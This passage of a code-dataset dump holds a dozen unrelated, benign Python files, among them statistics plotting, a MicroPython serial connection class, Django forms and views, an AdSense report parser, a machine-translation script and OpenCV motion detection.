de Pascal\r\n return corrida\r\n\r\ndef get_func_acumulada(f_den, corrida):\r\n # Funcion acumulada\r\n f_acum = []\r\n total = sum(f_den)\r\n f_acum.append(f_den[0] / total) # Sumo los valores de f(x) - Es como hacer la integral.\r\n for i in range(len(corrida) - 1):\r\n f_acum.append(f_acum[i] + f_den[i + 1] / total) \r\n\r\n return f_acum\r\n\r\ndef graph_pascal(corrida, k, p):\r\n fig1 = plt.figure(\"Distribucion de Pascal\")\r\n fig1.subplots_adjust(hspace=0.46, top = 0.78, bottom = 0.27, wspace=0.30, left=0.05, right=0.98)\r\n\r\n # Diagrama de barras\r\n fig1.add_subplot(1,3,1)\r\n plt.hist(corrida,max(corrida) * 2, (0, max(corrida) - 1), color = pascal_hist, edgecolor = pascal_borde_hist, linewidth=1)\r\n plt.xlabel('Valor de x')\r\n plt.ylabel('Frecuencia absoluta')\r\n poner_fondo_color()\r\n plt.grid(linestyle = '--')\r\n\r\n # Funcion de probabilidad\r\n f_den = []\r\n for x in corrida:\r\n f = factorial(k + x - 1) / (factorial(x) * factorial(k - 1))\r\n f = f * (p ** k) * ((1 - p) ** x) # Funcion probabilidad pascal\r\n f_den.append(f)\r\n\r\n fig1.add_subplot(1,3,2)\r\n plt.stem(corrida, f_den, use_line_collection = True, basefmt= 'None', linefmt= pascal_hist)\r\n plt.xlabel('Valor de x')\r\n plt.ylabel('f(x) - funcion de densidad')\r\n poner_fondo_color()\r\n plt.grid(linestyle = '--')\r\n\r\n # Funcion acumulada\r\n corrida.sort()\r\n f_acum = get_func_acumulada(f_den, corrida)\r\n \r\n fig1.add_subplot(1,3,3)\r\n for i in range(len(corrida) - 1):\r\n plt.hlines(y= f_acum[i], xmin= corrida[i], xmax= corrida[i + 1], color = pascal_hist)\r\n if corrida[i] != corrida[i + 1]:\r\n plt.scatter([corrida[i]],[f_acum[i]], 20, color=unf_puntos)\r\n poner_fondo_color()\r\n plt.hlines(y= 1, xmin=corrida[0], xmax= int(corrida[-1]), color = exp_puntos, linestyle = '--')\r\n plt.grid(linestyle = '--')\r\n plt.xlabel('Valor de x')\r\n plt.ylabel('Frecuencia acumulada')\r\n plt.show()","sub_path":"TP 2.2 - Generadores VA/Codigo/e_pascal.py","file_name":"e_pascal.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"319550564","text":"import queue\nfrom thonny.misc_utils import TimeHelper\nfrom queue import Queue\nimport re\n\n\nclass MicroPythonConnection:\n \"\"\"Utility class for using Serial or WebSocket connection\n \n Uses background thread to read from the source as soon as possible\n to avoid loss of data (because buffer overflow or the device discarding \n unread data).\n\n Allows writing with delays after each n bytes.\n \n Allows unreading data. \n \"\"\"\n\n def __init__(self):\n self._read_queue = Queue() # populated by reader thread\n self._read_buffer = bytearray() # used for unreading and postponing bytes\n self.num_bytes_received = 0\n self._error = None\n\n def read(self, size, timeout=1):\n if timeout == 0:\n raise TimeoutError()\n\n timer = TimeHelper(timeout)\n\n while len(self._read_buffer) < size:\n self._check_for_error()\n\n try:\n self._read_buffer.extend(self._read_queue.get(True, timer.time_left))\n except queue.Empty:\n raise TimeoutError(\"Reaction timeout. 
Bytes read: %s\" % self._read_buffer)\n\n try:\n data = self._read_buffer[:size]\n return data\n finally:\n del self._read_buffer[:size]\n\n def soft_read_until(self, terminator, timeout=1000000):\n return self.read_until(terminator, timeout, timeout_is_soft=True)\n\n def read_until(self, terminator, timeout=1000000, timeout_is_soft=False):\n timer = TimeHelper(timeout)\n\n if isinstance(terminator, str):\n terminator = re.compile(re.escape(terminator))\n\n match = None\n while True:\n self._check_for_error()\n\n match = re.search(terminator, self._read_buffer)\n if match:\n break\n\n try:\n data = self._read_queue.get(True, timer.time_left)\n # print(\"RR\", repr(data), file=sys.stderr)\n assert len(data) > 0\n self._read_buffer.extend(data)\n except queue.Empty:\n if timeout_is_soft:\n break\n else:\n raise TimeoutError(\"Reaction timeout. Bytes read: %s\" % self._read_buffer)\n\n if match:\n size = match.end()\n else:\n assert timeout_is_soft\n size = len(self._read_buffer)\n\n data = self._read_buffer[:size]\n del self._read_buffer[:size]\n return data\n\n def _fetch_to_buffer(self):\n while not self._read_queue.empty():\n self._read_buffer.extend(self._read_queue.get(True))\n\n def peek_incoming(self):\n self._fetch_to_buffer()\n return self._read_buffer\n\n def read_all(self):\n self._fetch_to_buffer()\n\n if len(self._read_buffer) == 0:\n self._check_for_error()\n\n try:\n return self._read_buffer\n finally:\n self._read_buffer = bytearray()\n\n def _check_for_error(self):\n if self._error is None:\n return\n\n raise ConnectionClosedException(self._error)\n\n def unread(self, data):\n self._read_buffer = data + self._read_buffer\n\n def write(self, data, block_size=32, delay=0.01):\n raise NotImplementedError()\n\n def _log_data(self, data):\n print(\n data.decode(\"Latin-1\")\n .replace(\"\\r\\n\", \"\\n\")\n .replace(\"\\x01\", \"①\")\n .replace(\"\\x02\", \"②\")\n .replace(\"\\x03\", \"③\")\n .replace(\"\\x04\", \"④\"),\n end=\"\",\n )\n\n def incoming_is_empty(self):\n return self._read_queue.empty() and len(self._read_buffer) == 0\n\n def outgoing_is_empty(self):\n return True\n\n def buffers_are_empty(self):\n return self.incoming_is_empty() and self.outgoing_is_empty()\n\n def reset_input_buffer(self):\n return self.read_all()\n\n def reset_output_buffer(self):\n pass\n\n def close(self):\n raise NotImplementedError()\n\n\nclass ConnectionFailedException(Exception):\n pass\n\n\nclass ConnectionClosedException(Exception):\n pass\n","sub_path":"thonny/plugins/micropython/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"607050494","text":"#!/usr/bin/python\nimport os, time\nfrom pypresence import Presence\n\nold_timestamp = '0:00'\nclient_id = \"543459024390324245\"\nRPC = Presence(client_id)\nRPC.connect()\n\nwhile True:\n\ttime.sleep(1)\n\tartist = os.popen(\"rhythmbox-client --print-playing-format=\\\"%ta\\\"\").read()\n\ttitle = os.popen(\"rhythmbox-client --print-playing-format=\\\"%tt\\\"\").read()\n\ttimestamp = os.popen(\"rhythmbox-client --print-playing-format=\\\"(%te / %td)\\\"\").read()\n\n\t# play / pause\n\tif timestamp != old_timestamp:\n\t\told_timestamp = timestamp\n\t\tsmall_image = \"play-circle\"\n\telse:\n\t\tsmall_image = \"pause-circle\"\n\t\ttimestamp = \" (Paused)\"\n\n\t# prevent crash when stopped\n\tif len(artist) < 2:\n\t\tartist = \" \"\n\tif len(title) < 2:\n\t\ttitle = \"IDLE\"\n\n\tRPC.update(details=artist, 
state=title + timestamp, large_image=\"rhythmbox\", small_image=small_image)\n","sub_path":"rbdrp.py","file_name":"rbdrp.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"274659318","text":"# Desafio 053: Crie um programa que leia uma frase qualquer\n# e diga se ela é um palíndromo, desconsiderando os espaços.\n\n\nfrase=str(input(\"Digite uma frase: \")).strip().upper()\nsepara = frase.split()\njunto = ''.join(separa)\ninverso = ''\n\nfor letra in range(len(junto) - 1, -1, -1):\n inverso += junto[letra]\n\nif inverso == junto:\n print('Temos um PALÍDROMO.')\nelse:\n print('Não temos um PALÍDROMO.')\n\nprint('{} -> {}'.format(junto, inverso))","sub_path":"Desafio053.py","file_name":"Desafio053.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"341334685","text":"import os\n\ntornado_settings = dict(\n template_path = os.path.join(os.path.dirname(__file__),\"template\"),\n static_path = os.path.join(os.path.dirname(__file__),\"static\"),\n debug = True,\n port=8888,\n)\n\n## Site\ntitle = 'ForgetWall'\nsubtitle = 'Write it down and forget all.'\ndescription = 'Wancheng`s blog'\nauthor = \"Wancheng Zhang\"\nurl = 'http://wancheng.site'\ntheme = 'default' \n\n# Category & Tag\nheaders = [\n {'title':'首页','url':'/','class':'fa fa-home'},\n {'title':'归档','url':'life.md','class':'fa fa-archive'},\n {'title':'关于','url':'life.md','class':'fa fa-about'},\n {'title':'订阅','url':'life.md','class':'fa fa-rss'},\n ]\ncategories = [\n {'title':'技术','url':'_tech.md'},\n {'title':'生活','url':'life.md'},\n ]\ntags = ['Python','神经网络','tmux','爬虫']\n\nlinks = [\n {'title':'酷壳','url':'http://www.coolshell.cn'},\n {'title':'邓侃的博客','url':'http://blog.sina.com.cn/kdeng'},\n ]\n","sub_path":"tornado/setting-sample.py","file_name":"setting-sample.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"105018886","text":"import Command\n\n\nclass QUEUE(Command.Command):\n\n def __init__(self):\n self.__player_object = None\n\n def set_player_obj(self, obj):\n self.__player_object = obj\n\n def info(self):\n return \"player\"\n\n async def run(self, client, message):\n\n server = client.get_server_data(message)\n songs = self.__player_object.get_queue(server)\n\n inc = 0\n\n to_string = \"```Currently queued:\\n\\n\"\n\n for song in songs:\n if inc == 10:\n to_string += \"...\\n\"\n break\n to_string += song.get_name() + \"\\n\"\n inc += 1\n\n to_string += \"```\"\n\n return await client.send_message(message.channel, to_string)","sub_path":"ThreebotCommands/Player/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"639831142","text":"from django import forms\n\nfrom .fields import GroupedModelChoiceField\nfrom .models import Agentname, Lga, Party, PollingUnit, States\n\n\nclass GetPollingUnitDataForm(forms.Form):\n available_lgas = Lga.objects.filter(state_id=\"25\").values_list(\"lga_id\", flat=True)\n\n polling_unit = GroupedModelChoiceField(\n label=\"Polling Unit Number\",\n help_text=\"Choose a polling unit based on the polling unit number.\",\n queryset=PollingUnit.objects.filter(lga_id__in=available_lgas),\n choices_groupby=lambda obj: Lga.objects.get(lga_id=obj.lga_id).lga_name,\n )\n\n\nclass 
GetSummedPollingUnitsResultsinLgaForm(forms.Form):\n lga = GroupedModelChoiceField(\n label=\"Local Government Area\",\n queryset=Lga.objects.all(),\n choices_groupby=lambda obj: States.objects.get(state_id=obj.state_id).state_name,\n help_text=\"Select a local government area.\",\n )\n\n\nclass StoreNewPollingUnitResultForm(forms.Form):\n available_lgas = Lga.objects.filter(state_id=\"25\").values_list(\"lga_id\", flat=True)\n\n party = forms.ModelChoiceField(label=\"Party\", queryset=Party.objects.all())\n party_score = forms.IntegerField(label=\"Party Score\")\n polling_unit = GroupedModelChoiceField(\n label=\"Polling Unit\",\n help_text=\"Choose a polling unit based on the polling unit number.\",\n queryset=PollingUnit.objects.filter(lga_id__in=available_lgas),\n choices_groupby=lambda obj: Lga.objects.get(lga_id=obj.lga_id).lga_name,\n )\n entered_by_user = forms.ModelChoiceField(\n label=\"Agent\",\n queryset=Agentname.objects.all(),\n help_text=\"The name of the agent uploading the data.\",\n )\n","sub_path":"core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"29945294","text":"from django.views import generic\nfrom books.models import Book\nfrom django.http import Http404\nimport datetime\n\n\nclass BookListView(generic.ListView):\n model = Book\n context_object_name = 'books'\n\n def get_context_data(self, **kwargs):\n date = self.kwargs.get('pub_date')\n if date:\n try:\n formatted_date = datetime.datetime.strptime(date, '%Y-%m-%d')\n book = Book.objects.get(pub_date=formatted_date)\n prev_book = Book.objects.filter(pub_date__lt=formatted_date).order_by('pub_date').last()\n next_book = Book.objects.filter(pub_date__gt=formatted_date).order_by('pub_date').first()\n\n return {\n 'books': [book],\n 'prev_book': prev_book,\n 'next_book': next_book\n }\n except:\n raise Http404\n\n\n return super().get_context_data(**kwargs)\n\n","sub_path":"databases/models_list_displaying/books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"87397285","text":"\"\"\"\r\nReport.py\r\nCopyright (C) otacon 2010 \r\n\r\nAdSense-Monitor is free software: you can redistribute it and/or modify it\r\nunder the terms of the GNU General Public License as published by the\r\nFree Software Foundation, either version 3 of the License, or\r\n(at your option) any later version.\r\n\r\nAdSense-Monitor is distributed in the hope that it will be useful, but\r\nWITHOUT ANY WARRANTY; without even the implied warranty of\r\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\r\nSee the GNU General Public License for more details.\r\n \r\nYou should have received a copy of the GNU General Public License along\r\nwith this program. 
If not, see <http://www.gnu.org/licenses/>.\"\"\"\r\nfrom datetime import date\r\nimport re\r\n\r\nclass Report:\r\n\r\n\r\n def __init__(self,start_time = None,end_time = None):\r\n if not start_time:\r\n self.start_time = date.today()\r\n else:\r\n self.start_time = start_time\r\n\r\n if not end_time:\r\n self.end_time = date.today()\r\n else:\r\n self.end_time = end_time\r\n\r\n self.report_rows = []\r\n\r\n\r\n def add_row(self, report_row):\r\n if not isinstance(report_row,ReportRow):\r\n raise ValueError(\"report_row parameter must be ReportRow\")\r\n for row in self.report_rows:\r\n if row.get_day() == report_row.get_day():\r\n return False\r\n self.report_rows.append(report_row)\r\n\r\n\r\n def remove_row(self, report_row):\r\n if not isinstance(report_row,ReportRow):\r\n raise ValueError(\"report_row parameter must be ReportRow\")\r\n\r\n for row in self.report_rows:\r\n if row.get_day() == report_row.get_day():\r\n self.report_rows.remove(row)\r\n return True\r\n return False\r\n\r\n\r\n def get_row(self, year, month, day):\r\n report_time = date(year,month,day)\r\n for row in self.report_rows:\r\n if row.get_day() == report_time:\r\n return row\r\n return None\r\n\r\n def get_latest(self):\r\n if self.report_rows:\r\n return self.report_rows[0]\r\n else:\r\n return None\r\n\r\n\r\nclass ReportRow:\r\n\r\n\r\n def __init__(self):\r\n self.report_dict = {}\r\n self.report_dict['Earnings'] = 0\r\n self.report_dict['eCPM'] = 0\r\n self.report_dict['Impressions'] = 0\r\n self.report_dict['Clicks'] = 0\r\n self.report_dict['CTR'] = 0\r\n self.report_dict['Report Time'] = None\r\n \r\n\r\n def set_earnings(self,earnings):\r\n if not isinstance(earnings, (int, float)):\r\n raise ValueError(\"earnings parameter must be int or float\")\r\n self.report_dict['Earnings'] = earnings\r\n\r\n def get_earnings(self):\r\n return self.report_dict['Earnings']\r\n\r\n\r\n def set_ecpm(self,ecpm):\r\n if not isinstance(ecpm, (int, float)):\r\n raise ValueError(\"ecpm parameter must be int or float\")\r\n self.report_dict['eCPM'] = ecpm\r\n\r\n def get_ecpm(self):\r\n return self.report_dict['eCPM']\r\n\r\n\r\n def set_impressions(self,impressions):\r\n if not isinstance(impressions, (int)):\r\n raise ValueError(\"impressions parameter must be int\")\r\n self.report_dict['Impressions'] = impressions\r\n\r\n def get_impressions(self):\r\n return self.report_dict['Impressions']\r\n\r\n\r\n def set_clicks(self,clicks):\r\n if not isinstance(clicks, (int, float)):\r\n raise ValueError(\"clicks parameter must be int or float\")\r\n self.report_dict['Clicks'] = clicks\r\n\r\n def get_clicks(self):\r\n return self.report_dict['Clicks']\r\n\r\n\r\n def set_ctr(self,ctr):\r\n if not isinstance(ctr, (int, float)):\r\n raise ValueError(\"ctr parameter must be int or float\")\r\n self.report_dict['CTR'] = ctr\r\n\r\n def get_ctr(self):\r\n return self.report_dict['CTR']\r\n\r\n\r\n def set_day(self,year,month,day):\r\n report_time = date(year,month,day)\r\n self.report_dict['Report Time'] = report_time\r\n\r\n def get_day(self):\r\n return self.report_dict['Report Time']\r\n\r\n def get_differences(self,report_row):\r\n differences = []\r\n if report_row:\r\n if self.get_earnings() != report_row.get_earnings():\r\n differences.append('Earnings')\r\n if self.get_ecpm() != report_row.get_ecpm():\r\n differences.append('eCPM')\r\n if self.get_clicks() != report_row.get_clicks():\r\n differences.append('Clicks')\r\n if self.get_impressions() != report_row.get_impressions():\r\n differences.append('Impressions')\r\n if self.get_ctr() != 
report_row.get_ctr():\r\n differences.append('CTR')\r\n if self.get_day() != report_row.get_day():\r\n differences.append('Report Time')\r\n return differences\r\n \r\ndef parse_from_csv(csv_string):\r\n\r\n lines = csv_string.split('\\n')\r\n del lines[0]\r\n del lines[-1]\r\n del lines[-1]\r\n del lines[-1] \r\n report = Report()\r\n reg = re.compile('(....)-(..)-(..)\\t(.*?)\\t(.*?)\\t\"(.*?)%\"\\t\"(.*?)\"\\t\"(.*?)\"')\r\n for line in lines:\r\n value = reg.findall( line )\r\n year = int(value[0][0])\r\n month = int(value[0][1])\r\n day = int(value[0][2])\r\n impressions = int(value[0][3])\r\n clicks = int(value[0][4])\r\n ctr = float(value[0][5].replace(',','.'))\r\n ecpm = float(value[0][6].replace(',','.'))\r\n earnings = float(value[0][7].replace(',','.'))\r\n\r\n report_row = ReportRow() \r\n report_row.set_day(year,month,day)\r\n report_row.set_impressions(impressions)\r\n report_row.set_clicks(clicks)\r\n report_row.set_ctr(ctr)\r\n report_row.set_ecpm(ecpm)\r\n report_row.set_earnings(earnings)\r\n report.add_row(report_row)\r\n\r\n return report\r\n","sub_path":"core/Report.py","file_name":"Report.py","file_ext":"py","file_size_in_byte":5868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"615677606","text":"from semantic.tools.context import Context\nfrom semantic.tools.error import SemanticError, SemanticException\nfrom nodes.ast_nodes import ProgramNode, ClassNode\nfrom semantic.visitor import visitor\n\nclass TypeCollector(object):\n def __init__(self, errors=[]):\n self.context = None\n self.errors = errors\n\n @visitor.on('node')\n def visit(self, node):\n pass\n\n @visitor.when(ProgramNode)\n def visit(self, node):\n self.context = Context()\n self.context.create_builtin_types()\n for dec in node.classes:\n if dec.name in ['Object', 'Int', 'String', 'Bool', 'IO']:\n error = SemanticError(\"Is an error redefine a builint type\", dec.row, dec.col)\n self.errors.append(error)\n else:\n self.visit(dec)\n\n @visitor.when(ClassNode)\n def visit(self, node):\n try:\n self.context.create_type(node)\n except SemanticException as e:\n error = SemanticError(e.text, node.row, node.col)\n self.errors.append(error)\n","sub_path":"src/semantic/visitor/type_collector.py","file_name":"type_collector.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"272478063","text":"import argparse\nimport time\nimport torch\nfrom Models import get_model\nfrom Process import *\nimport torch.nn.functional as F\nfrom Optim import CosineWithRestarts\nfrom Batch import create_masks\nimport pdb\nimport dill as pickle\nimport argparse\nfrom Models import get_model\nfrom Beam import beam_search\nfrom nltk.corpus import wordnet\nfrom torch.autograd import Variable\nimport re\nimport random\nimport nltk.translate.bleu_score as bleu\n\ndef get_synonym(word, SRC):\n try:\n syns = wordnet.synsets(word)\n for s in syns:\n for l in s.lemmas():\n if SRC.vocab.stoi[l.name()] != 0:\n return SRC.vocab.stoi[l.name()]\n except:\n print('Resource wordnet not found.') \n return 0\n\ndef multiple_replace(dict, text):\n # Create a regular expression from the dictionary keys\n regex = re.compile(\"(%s)\" % \"|\".join(map(re.escape, dict.keys())))\n\n # For each match, look-up corresponding value in dictionary\n return regex.sub(lambda mo: dict[mo.string[mo.start():mo.end()]], text) \n\ndef postProcessing(src_sentence, translate_sentence):\n postProcessedSentence = 
translate_sentence\n if translate_sentence.strip().__contains__('....'):\n postProcessedSentence = translate_sentence.replace('....', '')\n if translate_sentence.strip().__contains__('..'):\n postProcessedSentence = translate_sentence.replace('..', '')\n # # Eg: \"Buổi sáng, tôi đang đi học\" -> \"bơgê, inh kung atung hok\"\n if len(src_sentence) > 0 and len(translate_sentence) > 0 and src_sentence[0].isupper() and not translate_sentence[0].isupper():\n postProcessedSentence = postProcessedSentence[0].upper() + postProcessedSentence[1:]\n if len(src_sentence) > 0 and len(translate_sentence) > 0 and src_sentence[0].isupper() and translate_sentence.startswith('\\'') and not translate_sentence[1].isupper():\n postProcessedSentence = '\\'' + postProcessedSentence[1].upper() + postProcessedSentence[2:]\n\n print('postProcessing', src_sentence, translate_sentence)\n # Eg: \"chắn\" -> \"Chơhning\"\n if len(src_sentence) > 0 and len(translate_sentence) > 0 and not src_sentence[0].isupper() and translate_sentence[0].isupper():\n postProcessedSentence = postProcessedSentence[0].lower() + postProcessedSentence[1:]\n if len(src_sentence) > 0 and len(translate_sentence) > 0 and not src_sentence[0].isupper() and translate_sentence.startswith('\\'') and translate_sentence[1].isupper():\n postProcessedSentence = '\\'' + postProcessedSentence[1].lower() + postProcessedSentence[2:]\n if not src_sentence.endswith('.') and translate_sentence.endswith('.'):\n lt = len(translate_sentence)\n postProcessedSentence = postProcessedSentence[:lt-1]\n elif src_sentence.endswith('.') and not translate_sentence.endswith('.'):\n postProcessedSentence += '.'\n return postProcessedSentence\n\ndef translate_sentence(sentence, model, opt, SRC, TRG):\n \n model.eval()\n indexed = []\n sentence = SRC.preprocess(sentence)\n for tok in sentence:\n if SRC.vocab.stoi[tok] != 0 or opt.floyd == True:\n indexed.append(SRC.vocab.stoi[tok])\n else:\n indexed.append(get_synonym(tok, SRC))\n sentence = Variable(torch.LongTensor([indexed]))\n if opt.device == 0:\n sentence = sentence.cuda()\n \n sentence = beam_search(sentence, model, SRC, TRG, opt)\n\n return multiple_replace({' ?' 
: '?',' !':'!',' .':'.','\\' ':'\\'',' ,':','}, sentence)\n\ndef translate(opt, model, SRC, TRG):\n sentences = opt.text.split('.')\n translated = []\n\n for sentence in sentences:\n res = translate_sentence(sentence + '.', model, opt, SRC, TRG).capitalize()\n res = postProcessing(src_sentence=sentence, translate_sentence=res)\n translated.append(res)\n\n return (' '.join(translated))\n\n\ndef randomizeTranslate(opt, model, SRC, TRG):\n txtVi = \"vi_0904_full_shuffle_test.txt\"\n txtBana = \"bana_0904_full_shuffle_test.txt\"\n txtViFile = open('data' + '/' + txtVi, encoding='utf-8', errors='ignore').read()\n txtBanaFile = open('data' + '/' + txtBana, encoding='utf-8', errors='ignore').read()\n splitsVi = txtViFile.split('\\n')\n splitsBana = txtBanaFile.split('\\n')\n txtViNew = ''\n txtBanaTranslated = ''\n txtBanaNew = ''\n num_rows = len(splitsVi)\n for i in range(200):\n try:\n randNum = random.randint(0, num_rows - 1)\n print('[VI] ' + splitsVi[randNum] + '\\n')\n opt.text = splitsVi[randNum]\n phrase = translate(opt, model, SRC, TRG)\n txtBanaTranslated += phrase + '\\n'\n txtViNew += splitsVi[randNum] + '\\n'\n txtBanaNew += splitsBana[randNum] + '\\n'\n print('[BANA] ' + phrase + '\\n')\n print('-----------------------------------------')\n except:\n print('An exception occurred')\n \n with open('test_result' + '/test-sentences-vi.txt', 'w', encoding='utf-8') as f:\n f.write(txtViNew)\n with open('test_result' + '/test-sentences-bana.txt', 'w', encoding='utf-8') as f:\n f.write(txtBanaTranslated)\n with open('test_result' + '/truth-sentences-bana.txt', 'w', encoding='utf-8') as f:\n f.write(txtBanaNew)\n\n\ndef main():\n \n parser = argparse.ArgumentParser()\n parser.add_argument('-load_weights', required=True)\n parser.add_argument('-k', type=int, default=3)\n parser.add_argument('-max_len', type=int, default=80)\n parser.add_argument('-d_model', type=int, default=512)\n parser.add_argument('-n_layers', type=int, default=6)\n parser.add_argument('-src_lang', required=True)\n parser.add_argument('-trg_lang', required=True)\n parser.add_argument('-heads', type=int, default=8)\n parser.add_argument('-dropout', type=float, default=0.1)\n parser.add_argument('-no_cuda', action='store_true')\n parser.add_argument('-floyd', action='store_true')\n \n opt = parser.parse_args()\n\n opt.device = 0 if opt.no_cuda is False else -1\n \n assert opt.k > 0\n assert opt.max_len > 10\n\n SRC, TRG = create_fields(opt)\n model = get_model(opt, len(SRC.vocab), len(TRG.vocab))\n # randomizeTranslate(opt, model, SRC, TRG)\n \n while True:\n opt.text = input(\"Enter a sentence to translate (type 'f' to load from file, or 'q' to quit):\\n\")\n if opt.text==\"q\":\n break\n if opt.text=='f':\n fpath = input(\"Enter the path of the text file to translate:\\n\")\n try:\n opt.text = ' '.join(open(fpath, encoding='utf-8').read().split('\\n'))\n except:\n print(\"error opening or reading text file\")\n continue\n phrase = translate(opt, model, SRC, TRG)\n print('> '+ phrase + '\\n')\n\nif __name__ == '__main__':\n main()\n","sub_path":"translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":6812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} {"seq_id":"299088417","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\nimport imutils\nimport time\nimport cv2\n\nfrom settings import get_setting\nimport log\nfrom notification import add_notification\nfrom filemanagement import 
rename_file_with_motion\n\nvideo_frame_width = 500\n\ndef calculate_min_area(width, height):\n pixel_count = video_frame_width/width * height * video_frame_width\n per = get_setting(\"percentage_of_frame\") / 100\n \n return per * pixel_count\n\n#ugly solution to fix first notification problem\nprevious_notification_time = time.time() - 600\n\ndef detect_motion(file, ip_camera):\n #calculate min_area\n min_area = calculate_min_area(ip_camera.width, ip_camera.height) \n camera = cv2.VideoCapture(file.filename)\n firstFrame = None\n motion_detected = False\n global previous_notification_time\n \n log.log(0, \"Motion detection started on file: \" + file.filename)\n \n while(1):\n #grab the current frame and initialize the occupied/unoccupied\n (grabbed, frame) = camera.read()\n \n #if the frame could not be grabbed, then we have reached the end of the video\n if not grabbed:\n log.log(0, \"Motion detection ended on file: \" + file.filename)\n break\n\n if time.time() > previous_notification_time + get_setting(\"min_time_between_notifications\"):\n #resize the frame, convert it to grayscale, and blur it\n frame = imutils.resize(frame, width= video_frame_width)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n \n #if the first frame is None, initialize it\n if firstFrame is None:\n firstFrame = gray\n continue\n \n #compute the absolute difference between the current frame and first frame\n frameDelta = cv2.absdiff(firstFrame, gray)\n thresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1]\n \n #dilate the thresholded image to fill in holes, then find contours on thresholded image\n thresh = cv2.dilate(thresh, None, iterations=2)\n (cnts, _) = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n #loop over the contours\n for c in cnts:\n #if the contour is too small, ignore it\n if cv2.contourArea(c) < min_area:\n continue\n #preventing too many notifications\n if time.time() > previous_notification_time + get_setting(\"min_time_between_notifications\"):\n log.log(1, \"Motion detected on \" + ip_camera.name)\n add_notification(\"Motion detected on \" + ip_camera.name)\n if not motion_detected:\n rename_file_with_motion(file)\n previous_notification_time = time.time()\n motion_detected = True\n file.motion = True\n continue\n\n #clean up the camera \n camera.release()\n","sub_path":"motiondetection.py","file_name":"motiondetection.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"272087958","text":"import json\nimport urllib\nfrom string import Template\nfrom datetime import date\n\n\ndef getPicAddress(ASIN):\n str1=\"http://112.124.1.3:8004/api/commodity/\"\n str2=\"?field=['productInfo']\"\n data=json.loads(urllib.urlopen(str1+ASIN+str2).read())\n return data['productInfo'][0]['img']\n\n\ndef getProductName(ASIN):\n str1=\"http://112.124.1.3:8004/api/commodity/\"\n str2=\"?field=['productInfo']\"\n data=json.loads(urllib.urlopen(str1+ASIN+str2).read())\n return data['productInfo'][0]['name'].replace('\"','"').replace(\",\",''')\n \n\ndef getAllProductsInCategory(categoryName):\n categoryName=categoryName.replace('&','$')\n count=getProductCount(categoryName)\n if count%20==0:\n pageNum=count/20\n else:\n pageNum=count/20+1\n ret=[]\n for i in range(1,pageNum+1):\n str1='http://112.124.1.3:8004/api/commodity?category_name=${name}'\n str2=\"page=${num}&field=['ASIN']\"\n 
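# each page holds at most 20 items; fetch this page and collect its ASIN entries\n        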
data=json.loads(urllib.urlopen('&'.join([Template(str1).safe_substitute(name=categoryName),Template(str2).safe_substitute(num=str(i))])).read())\n for item in data:\n ret.append(item)\n return ret\n\n\ndef getProductCount(categoryName):\n categoryName=categoryName.replace('&','$')\n data=json.loads(urllib.urlopen('http://112.124.1.3:8004/api/commodity/count/?category_name='+categoryName).read())\n return data['count']\n\n\ndef getSaleTime(ASIN):\n str1=Template('http://112.124.1.3:8004/api/commodity/${product}').safe_substitute(product=ASIN)\n str2=\"field=['review']\"\n data=json.loads(urllib.urlopen('?'.join([str1,str2])).read())\n ret=[]\n for item in data['review']:\n datestr=item['publishTime'].split(None,1)[0]\n datearr=datestr.split('-')\n dateobj=date(int(datearr[0]),int(datearr[1]),int(datearr[2]))\n ret.append(dateobj)\n list.sort(ret)\n return ret\n\n\n#Only the lowest price of the same time is obtained...\ndef getOfferList(ASIN):\n str1=Template('http://112.124.1.3:8004/api/commodity/${product}').safe_substitute(product=ASIN)\n str2=\"field=['offer']\"\n data=json.loads(urllib.urlopen('?'.join([str1,str2])).read())\n ret=dict()\n for item in data['offer']:\n for smallerItem in item['info']:\n datestr=smallerItem['timestamp'].split(None,1)[0]\n datearr=datestr.split('-')\n key=date(int(datearr[0]),int(datearr[1]),int(datearr[2]))\n if ret.has_key(key):\n if smallerItem['price'] < ret[key]:\n ret[key]=smallerItem['price']\n else:\n ret[key]=smallerItem['price']\n return ret\n\n def to_xml(self, raw):\n s = \"\"\n for k, v in raw.items():\n s += \"<{0}>{1}</{0}>\".format(k, v, k)\n return \"<xml>{0}</xml>\".format(s)\n\n def to_dict(self, content):\n raw = {}\n root = etree.fromstring(content)\n for child in root:\n raw[child.tag] = child.text\n return raw\n\n async def fetch(self, url, data, setdefault=True, loop=None):\n if setdefault:\n data.setdefault(\"appid\", self.app_id)\n data.setdefault(\"mch_id\", 